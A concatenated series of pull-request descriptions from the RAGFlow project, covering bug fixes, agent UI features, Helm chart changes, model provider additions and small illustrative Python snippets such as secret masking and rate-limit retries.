The bug occurred when enabling or disabling a chunk on the “Knowledge
Base / Dataset / Chunk” web page.
<img width="2388" height="662" alt="image"
src="https://github.com/user-attachments/assets/575987a0-c929-4589-bfa0-ba54e137cfd9"
/>
It occurred because some API parameters differ between OpenSearch and
ES. After the fix, enabling, disabling, and rewriting a chunk all work
correctly. I also checked the result on the chat web page.
<img width="2394" height="660" alt="image"
src="https://github.com/user-attachments/assets/8b899dc6-d769-4e80-8dd8-ad0fbbca5f78"
/>
I will continue to focus on vector databases, especially OpenSearch.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: 张雨豪 <zhangyh80@chinatelecom.cn>
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Feat: Downstream operators can get the variables defined by the user
input operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Upload files in the chat box on the agent page #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Allows users to delete a condition of a conditional operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix an issue with `keep_alive=-1` for the Ollama chat model by allowing
the user to set an additional configuration option. It is a non-breaking
change because it still uses the previous default value, `keep_alive=-1`.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [X] Performance Improvement
- [X] Other (please describe):
- Additional configuration option has been added to control behavior of
RAGFlow while working with ollama LLM
### What problem does this PR solve?
Feat: Modify the background color of the agent canvas #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Obfuscates additional secrets values on ragflow_server startup to
prevent leakage:
* `secret` (azure)
* `client_secret` (oauth)
* `http_secret_key` (authentication)
* `sas_token` (azure)
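A minimal sketch of how such masking might work on a nested config before it is logged. The key names come from the list above; the function name, the mask string, and the recursive approach are assumptions for illustration, not the server's actual implementation.

```python
SENSITIVE_KEYS = {"secret", "client_secret", "http_secret_key", "sas_token"}
MASK = "********"


def obfuscate(config):
    """Return a copy of config with values of sensitive keys masked."""
    if isinstance(config, dict):
        return {
            key: MASK if key in SENSITIVE_KEYS and value is not None else obfuscate(value)
            for key, value in config.items()
        }
    if isinstance(config, list):
        return [obfuscate(item) for item in config]
    return config  # scalars are returned unchanged
```

Because a new structure is returned, the live configuration keeps its real values and only the logged copy is masked.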
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: Gifford R Nowland <gifford.r.nowland@aero.org>
### What problem does this PR solve?
Previous version created labels which were dependent on the specific
Helm chart version such as:
```
volumeClaimTemplates:
  - metadata:
      name: redis-data
      labels:
        helm.sh/chart: ragflow-0.2.3-dev.0.opensearch-test.4
        app.kubernetes.io/name: ragflow
        app.kubernetes.io/instance: test-1
        app.kubernetes.io/version: "9a04408"
        app.kubernetes.io/managed-by: Helm
        app.kubernetes.io/component: redis
```
which causes `helm upgrade` commands to fail with
```
Upgrade "test-1" failed: cannot patch "test-1-ragflow-redis" with
kind StatefulSet: StatefulSet.apps "test-1-ragflow-redis" is
invalid: spec: Forbidden: updates to statefulset spec for fields
other than 'replicas', 'ordinals', 'template', 'updateStrategy',
'persistentVolumeClaimRetentionPolicy' and 'minReadySeconds' are
forbidden
```
because the labels changed on upgrade.
This fix uses a reduced set of labels to prevent upgrade failures.
### Type of change
- [X] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix the Kubernetes liveness probe on the OpenSearch container. The previous
HTTP probe received a 401 response from the OpenSearch API, which was
treated as a failure and caused the container to be restarted every 20
minutes.
### Type of change
- [X] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Replace Avatar with RAGFlowAvatar component for knowledge base and
agent, optimize Agent template page, and modify bugs in knowledge base
#3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Bump to infinity v0.6.0-dev4.
WARNING: infinity v0.6.0-dev4 uses a metadata format that is very different
from older versions. If you have existing data, you must destroy the infinity
data volume and restart the infinity container.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add model provider DeepInfra. This model list comes from our community.
NOTE: most endpoints haven't been tested, but they should work as OpenAI
does.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Share agent dialog box externally #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
OpenAI-compatible-API supports references.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Fixed the issue where the error prompt box on the Agent page would
be covered #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
- Extended embedding model timeout from 3 to 10 seconds in api_utils.py
- Added more time for large file batches and concurrent parsing
operations to prevent test flakiness
- Import from #8940
- https://github.com/infiniflow/ragflow/actions/runs/16422052652
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
PR #8665 updated chrome and chromedriver sources, removing the appended
version number. This PR resolves filename inconsistencies that would
cause `Dockerfile.deps` to fail to build when omitting `--china-mirrors`
when running `uv run download_deps.py`.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Switch to Kubernetes StatefulSet resources for MySQL, Minio and vector
DB since these are stateful application components. This makes
operations such as helm upgrade smoother since the default container
update strategy becomes a sequential rolling update of each pod.
Also fixes a bug in the name template for the Minio stateful set
resource to align it with the naming convention used for other
components.
### Type of change
- [X] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Adds configurations for gemini-2.5-flash and gemini-2.5-pro models,
including tags, maximum token limits, and model types.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Use `quote_plus` to escape password in opendal's mysql url to support
special characters like `#`.
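A minimal sketch of why the escaping matters, using the standard library only. The helper `build_mysql_url` and its parameters are hypothetical; the actual opendal connection code may assemble the URL differently.

```python
from urllib.parse import quote_plus


def build_mysql_url(user, password, host, port, database):
    """Build a MySQL URL with the credentials percent-encoded.

    Without escaping, a '#' in the password would start the URL fragment
    and an '@' would be mistaken for the end of the credentials.
    """
    return (
        f"mysql://{quote_plus(user)}:{quote_plus(password)}"
        f"@{host}:{port}/{database}"
    )


if __name__ == "__main__":
    print(build_mysql_url("root", "p#ss@word", "localhost", 3306, "rag_flow"))
```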
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
- Update `get_parser_config` to merge provided configs with defaults
- Add GraphRAG configuration defaults for all chunk methods
- Make raptor and graphrag fields non-nullable in ParserConfig schema
- Update related test cases to reflect config changes
- Ensure backward compatibility while adding new GraphRAG support
- #8396
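The merge behavior in the first bullet can be sketched roughly as follows. This is an illustration under assumptions: `deep_merge`, `DEFAULT_PARSER_CONFIG`, and the `use_raptor` / `use_graphrag` field names are hypothetical stand-ins, not the actual `get_parser_config` implementation.

```python
from copy import deepcopy

# Hypothetical defaults used only for illustration.
DEFAULT_PARSER_CONFIG = {
    "chunk_token_num": 512,
    "raptor": {"use_raptor": False},
    "graphrag": {"use_graphrag": False},
}


def deep_merge(defaults, overrides):
    """Recursively overlay `overrides` on a copy of `defaults`."""
    merged = deepcopy(defaults)
    for key, value in (overrides or {}).items():
        if isinstance(value, dict) and isinstance(merged.get(key), dict):
            merged[key] = deep_merge(merged[key], value)
        else:
            merged[key] = deepcopy(value)
    return merged
```

With this approach a caller that supplies only `{"graphrag": {"use_graphrag": True}}` still receives the default `chunk_token_num` and `raptor` entries, which is what keeps the raptor and graphrag fields non-null.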
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Improve usability of Node.js/JavaScript code executor.
### Type of change
- [x] Refactoring
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
Co-authored-by: writinwaters <93570324+writinwaters@users.noreply.github.com>
### What problem does this PR solve?
Correct cancel logic error
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] Refactoring
### What problem does this PR solve?
Feat: Adjust the page header to breadcrumbs #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add the option to use the knowledge graph to the retrieval form
#3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Fixed the issue that the key parameter duplication check of the
begin operator was incorrect #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Fixed the issue of clicking to run the agent causing an error #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Generate avatar; Add knowledge graph; Modify the style of the
multi-select component
[#3221](https://github.com/infiniflow/ragflow/issues/3221)
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Fixed the issue that variables defined in the begin operator cannot
be referenced in the switch operator. #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Display agent version in pages #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Display agent history versions #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Adjust the style of the agent canvas connection line #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Adds OpenSearch support to the RAGFlow Helm chart based on
https://github.com/infiniflow/ragflow/pull/7140 and the existing
Elasticsearch support in the Helm chart.
### Type of change
- [X] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Fixed the issue that the content of the Dropdown section cannot be
seen when selecting the next operator #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Adjust the EmbedDialog style #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Show agent embed dialog #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add TavilyExtract operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Fixed the issue that the knowledge graph could not be displayed
#8890
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix the problem that the custom footer of modal component is not
effective, specify the react and react-dom versions, and add the
input-number component
[#3221](https://github.com/infiniflow/ragflow/issues/3221)
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix OpenSearch `OSConnection` initialization.
```
docStoreConn = rag.utils.opensearch_conn.OSConnection()
```
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Signed-off-by: zhanluxianshen <zhanluxianshen@163.com>
### What problem does this PR solve?
When both `if 'signature_version' in self.s3_config:` and
`if 'addressing_style' in self.s3_config:` are true, the config is
initialized incorrectly: the first setting is overwritten by the last one.
This PR fixes that case.
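A minimal sketch of the idea, assuming the two options end up as keyword arguments for a single client config object (for example `botocore.config.Config`, which accepts `signature_version` and an `s3` dictionary). The helper name `build_config_kwargs` is hypothetical.

```python
def build_config_kwargs(s3_config):
    """Collect all optional settings into one dict instead of rebuilding
    the config object in each branch, so no branch overwrites another."""
    kwargs = {}
    if "signature_version" in s3_config:
        kwargs["signature_version"] = s3_config["signature_version"]
    if "addressing_style" in s3_config:
        kwargs["s3"] = {"addressing_style": s3_config["addressing_style"]}
    return kwargs
```

The resulting dict can then be expanded into one config constructor call, so both settings survive when both keys are present.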
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Signed-off-by: zhanluxianshen <zhanluxianshen@163.com>
### What problem does this PR solve?
Feat: Display the thinking process according to the start_to_think flag
of the message #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
fix: modify the connection ports of minio and redis in
service_conf.yaml.template
### What problem does this PR solve?
If you modify the external ports of minio and redis in the .env file, the
change also affects the in-container connection ports in the
service_conf.yaml.template file, which is incorrect.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Correct the logging message from "OpenAI cat_with_tools" to "OpenAI
chat_with_tools" in the `_exceptions` method of the `Base` class to
accurately reflect the method name and improve error traceability.
### Type of change
- [x] Typo
### What problem does this PR solve?
Add Kimi model series support.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fixed the "Tree structure not found for treeKey" error in the knowledge graph.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
This PR enhances the application's capabilities by adding support for
four new Voyage embedding models (voyage-3-large, voyage-3.5,
voyage-3.5-lite, and voyage-code-3) to the `llm_factories.json`
configuration file. These models expand the available options for text
embedding tasks, enabling improved processing of text data with a
maximum token limit of 32,000. This addition addresses the need for more
diverse and specialized embedding models to support various use cases
without altering existing functionality.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add agent tool CrawlerForm #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add CrawlerForm component #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Display file references for agent dialogues #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fixed invalid save() arguments for slide thumbnails.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Add authorization token field to the MCP form #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix context loss caused by separating markdown tables from original
text. #6871, #8804.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
This change adds 'Vietnamese' to the list of supported languages in two
components related to cross-language functionality. The addition expands
language support by including Vietnamese as a selectable option
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fixes no chunks parsed out for Law. #5113
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Adjust agent mcp style #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Synchronize MCP data to agent #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Render the mcp list on the agent page #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Filter MCP server list by text. #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### AgentCreateBUGFix
Because useFetchFlowTemplates is called both in the hooks and the
AgentTemplateModal, and the ID of the empty template is generated via
uuid, there may be cases where the IDs do not match.
The bug is reported as follows:
Prompt: 101
Required argument is missing: dsl;
<img width="472" height="121" alt="52d79682-4e50-4863-8486-f1e154003043"
src="https://github.com/user-attachments/assets/c5d217c9-b6cc-4ef2-866b-694c8b9ab3ae"
/>
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: 海贼宅 <stu_xyx@163.com>
### What problem does this PR solve?
### Type of change
- [x] Refactoring
- [x] Performance Improvement
Signed-off-by: zhanluxianshen <zhanluxianshen@163.com>
### What problem does this PR solve?
Add document viewers for text and markdown files
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Import and export MCP Server #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix dataset page bugs, add icon support to the Input component, add a Radio
component, and remove antd from the chunk-result-bar page
[#3221](https://github.com/infiniflow/ragflow/issues/3221)
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Change document status in bulk.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add xAI provider (experimental feature, requires user feedback).
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Modify the agent tool name #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fixes a function name typo for the `/list` route in
`api/apps/conversation_app.py`.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Avoid the form sheet covering the chat sheet #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
The rm function in chunk_app.py now takes the index name differently
than other functions, so there will be situations where users can create
and update a chunk but not delete it.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Based on https://github.com/infiniflow/ragflow/issues/8740
1. Better handling of the `'NoneType' object is not subscriptable` error
2. Add some logs to capture the internal message
### Type of change
- [x] Refactoring
### What problem does this PR solve?
Changed the default value of `chunk_token_num` from 128 to 512 in both
HTTP and Python API reference documentation to reflect the updated
configuration.
#8753
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
Updated the default `chunk_token_num` value in `api_utils.py` and
`validation_utils.py` to 512 to accommodate larger text chunks. Adjusted
corresponding test cases in HTTP and SDK API tests to reflect this
change.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Display MCP multiple selection bar #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Validate dialog name in `dialog_app.py` to ensure it is a non-empty
string and does not exceed 255 bytes in UTF-8 encoding.
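A minimal sketch of such a check, assuming a hypothetical helper `validate_dialog_name` that returns an error message or `None`; the actual code in `dialog_app.py` and its error wording may differ. Note that the limit is measured in encoded bytes, not characters.

```python
MAX_NAME_BYTES = 255


def validate_dialog_name(name):
    """Return an error message, or None when the name is acceptable."""
    if not isinstance(name, str):
        return "Dialog name must be a string."
    if not name.strip():
        return "Dialog name can't be empty."
    # Multi-byte characters count by their UTF-8 length, not as one unit.
    if len(name.encode("utf-8")) > MAX_NAME_BYTES:
        return f"Dialog name must not exceed {MAX_NAME_BYTES} bytes."
    return None
```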
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fetch the data on the dataset page through the API, and replace the polling
that fetched all data every 15 seconds with polling that fetches only the
current page every 5 seconds while existing files are being parsed.
[#3221](https://github.com/infiniflow/ragflow/issues/3221)
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
This commit introduces a comprehensive test suite for the dialog app,
including tests for creating, updating, retrieving, listing, and
deleting dialogs. Additionally, the common.py file has been updated to
include necessary API endpoints and helper functions for dialog
operations.
### Type of change
- [x] Add test cases
### What problem does this PR solve?
1. Remove the redundant pop logic, since the case is already checked by the
if statement
2. Merge the logging logic
### Type of change
- [x] Refactoring
### What problem does this PR solve?
Added support for preview of txt, md, excel, csv, ppt, image, doc and
other files [#3221](https://github.com/infiniflow/ragflow/issues/3221)
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Get the running log of each message through the trace interface
#3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
'handleOk' was used before it was defined.
eslint@typescript-eslint/no-use-before-define
### What problem does this PR solve?
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Suppress docker-compose warnings such as:
```bash
The "HF_ENDPOINT" variable is not set. Defaulting to a blank string.
The "MACOS" variable is not set. Defaulting to a blank string.
The "SANDBOX_EXECUTOR_MANAGER_IMAGE" variable is not set. Defaulting to a blank string.
The "SANDBOX_EXECUTOR_MANAGER_PORT" variable is not set. Defaulting to a blank string.
```
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] Refactoring
### What problem does this PR solve?
Use use-chunk-request.ts to replace chunk-hooks.ts; implement chunk
selectAll, enable, disable and other functions
[#3221](https://github.com/infiniflow/ragflow/issues/3221)
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
- Ensure consistent Minio deployment by pinning the image to a specific
release version (RELEASE.2025-06-13T11-33-47Z) for stability and
reproducibility.
- #8672
### Type of change
- [x] Refactoring
### What problem does this PR solve?
Feat: Support uploading files when running agent #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
fix: retry embedding with Qwen family models when rate limits are
temporarily reached.
The APIs of Qwen family models are rate limited. When the limit is reached,
the "output" attribute of "resp" is None, which in turn causes a
TypeError when trying to retrieve "embeddings". Since these limits are
usually temporary, I have added a simple retry mechanism to work around them.
In addition, once retry_max is reached, the error is raised early instead of
being hidden behind a "TypeError".
### What problem does this PR solve?
Sometimes Qwen rejects calls because of rate limits, which stops the whole
parsing procedure when creating a knowledge base. In this situation,
resp["output"] is None, and resp["output"]["embeddings"] raises a
TypeError. Since the limits are temporary, I apply a simple retry
mechanism to solve it.
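A minimal sketch of such a retry loop, under assumptions: `call_api` is a hypothetical zero-argument callable that returns a dict-like response, and the delay and `RuntimeError` are illustrative choices rather than the values used in the PR.

```python
import time


def embed_with_retry(call_api, retry_max=5, delay_seconds=1.0, sleep=time.sleep):
    """Call the embedding API until it returns an output or retries run out."""
    for attempt in range(1, retry_max + 1):
        resp = call_api()
        output = resp["output"]
        if output is not None:
            return output["embeddings"]
        # "output" is None when the rate limit was hit; wait and try again.
        if attempt < retry_max:
            sleep(delay_seconds)
    # Raise a descriptive error early instead of a later TypeError.
    raise RuntimeError(
        f"Embedding request still rate limited after {retry_max} attempts"
    )
```

Passing `sleep` as a parameter keeps the function easy to test without real waiting.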
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
Fix the case where pages variable might be None
### What problem does this PR solve?
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
1. The old base image no longer included the curl command; an updated image
is used to fix this issue (the service has been tested with the new version)
2. Add a health check
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix a small typo in count of used fragments.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Fix: Wrong Citation Display #8594, #8474
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
fix: Create a new message component to replace the antd message
component, create a new Spin component to replace the antd Spin
component, optimize the original paging component style, and optimize
the chunk result page
[#3221](https://github.com/infiniflow/ragflow/issues/3221)
### Type of change
- [X] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Optimized the style of the dataset configuration page and added the
logic of cancelling submission
[#3221](https://github.com/infiniflow/ragflow/issues/3221)
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Resolves ambiguity and potential MITM attacks by using official channel
for chromedriver-linux in download_deps.py
### Type of change
- [x] Performance Improvement
### What problem does this PR solve?
Fix: Fixed the issue where the debug form Switch component had no
default value #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Fixed the issue of retrieval operator text overlapping #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Edit the output data of the code operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Display the iteration operator toolbar #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Optimize the style and logic of the profile
[#3221](https://github.com/infiniflow/ragflow/issues/3221)
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Combine the output logs of the same operator together #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Issue #8602
`parser_config.task_page_size` can default to `None` when a dataset is
created via the API. This was not handled by the `task_executor.py` code, so
`page_size` could sometimes be `None`, which causes an issue in line
351.
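A minimal sketch of the kind of guard this implies. The helper `resolve_page_size` and the fallback value are hypothetical; the real default used by `task_executor.py` is not stated in this description.

```python
DEFAULT_PAGE_SIZE = 12  # hypothetical fallback, not taken from the PR


def resolve_page_size(parser_config):
    """Return a usable page size even when the stored value is None."""
    page_size = (parser_config or {}).get("task_page_size")
    return DEFAULT_PAGE_SIZE if page_size is None else page_size
```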
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
The following error occurred during local testing, which should be fixed
by configuring 'exist_ok=True'.
```log
set_progress(7461edc2535c11f0a2aa0242c0a82009), progress: -1, progress_msg: 21:41:41 Page(1~100000001): [ERROR][Errno 17] File exists: '/ragflow/tmp'
```
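For reference, a minimal standard-library sketch of the `exist_ok=True` behavior; the helper name `ensure_dir` is hypothetical.

```python
import os


def ensure_dir(path):
    """Create `path` if needed; do nothing if it already exists.

    Without exist_ok=True, a second call (or a concurrent worker that
    created the directory first) raises FileExistsError, i.e. Errno 17.
    """
    os.makedirs(path, exist_ok=True)
    return path
```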
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Update Chrome download URL in use_china_mirrors configuration
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: lqh <liqunhuan@foreveross.com>
### What problem does this PR solve?
Feat: Convert the arguments parameter of the code operator to a
dictionary #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix the config option name of the opendal table name and setting of
'max_allowed_packet'.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Signed-off-by: He Wang <wanghechn@qq.com>
### What problem does this PR solve?
This PR introduces Google Cloud Vision API integration to enhance image
understanding capabilities in the application. It addresses the need for
advanced image description and chat functionalities by implementing a
new `GoogleCV` class to handle API interactions and updating relevant
configurations. This enables users to leverage Google Cloud Vision for
image-to-text tasks, improving the application's ability to process and
interpret visual data.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Construct the to field of the classification operator when saving
data #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Add comprehensive test suite for chunk operations including:
- Test files for create, list, retrieve, update, and delete chunks
- Authorization tests
- Batch operations tests
- Update test configurations and common utilities
- Validate `important_kwd` and `question_kwd` fields are lists in
chunk_app.py
- Reorganize imports and clean up duplicate code
### Type of change
- [x] Add test cases
### What problem does this PR solve?
Fix a docx parse error.

### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Parsing some docx files with the naive method causes an error:
`block.style.name` in the function `__get_nearest_title` can be None in some cases.
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: wenxuan.zhang <wenxuan.zhang@chinacreator.com>
### What problem does this PR solve?
Fix: Fixed the issue that the global variables of the code operator
cannot be selected #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Fixed the issue where variables were not displayed in the switch
operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
This PR addresses an incompatibility issue with the Google Chat API by
correcting the message content format in the `GoogleChat` class.
Previously, the content was directly assigned to the "parts" field,
which did not align with the API's expected format. This change ensures
that messages are properly formatted with a "text" key within a
dictionary, as required by the API.
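A minimal sketch of the format difference, assuming a hypothetical helper `to_google_message` and that `parts` is a list of dictionaries; the actual `GoogleChat` code may build the message differently.

```python
def to_google_message(role, content):
    """Wrap plain text in a part dictionary with a "text" key."""
    # Before the fix (per the description): {"role": role, "parts": content}
    return {"role": role, "parts": [{"text": content}]}
```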
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Add agent advanced settings form #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: the output log is incorrect
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: liang <xiaofeng.liang@landstech.com.cn>
### What problem does this PR solve?
Add file management HTTP_API for operating files
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
This PR enables the `Form` component within the `GoogleModal` to
directly access and manipulate the form state by passing the form
instance from the parent component. This enhances form control and data
manipulation capabilities within the modal, improving the component's
functionality and integration with the parent form.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: In a dialog message, users can enter different types of data #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Switching threading.Lock() to asyncio.Lock(), since threading.Lock() is
blocking.
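A minimal sketch of the difference in usage: `asyncio.Lock` is acquired with `async with`, so a waiting coroutine yields to the event loop instead of blocking the whole thread. The counter example is illustrative only and is not taken from the RAGFlow code.

```python
import asyncio


async def count_with_lock(workers=10):
    """Increment a shared counter from several coroutines under one lock."""
    lock = asyncio.Lock()
    state = {"value": 0}

    async def worker():
        async with lock:  # waiting here does not block the event loop
            current = state["value"]
            await asyncio.sleep(0)  # yield while holding the lock
            state["value"] = current + 1

    await asyncio.gather(*(worker() for _ in range(workers)))
    return state["value"]


if __name__ == "__main__":
    print(asyncio.run(count_with_lock()))
```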
### Type of change
- [x] Performance Improvement
### What problem does this PR solve?
Feat: Fixed the issue that the top toolbar disappears when opening the
agent operator form #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Support GiteeAI model #1853
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Allow users to enter text in the middle of a chat #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Fixed the issue where the begin operator parameters could not be
submitted during debugging #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Display sub-agents in agent form #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Fixed the issue where the prompt menu content was hidden #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Allow users to choose which MCP tools are enabled.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
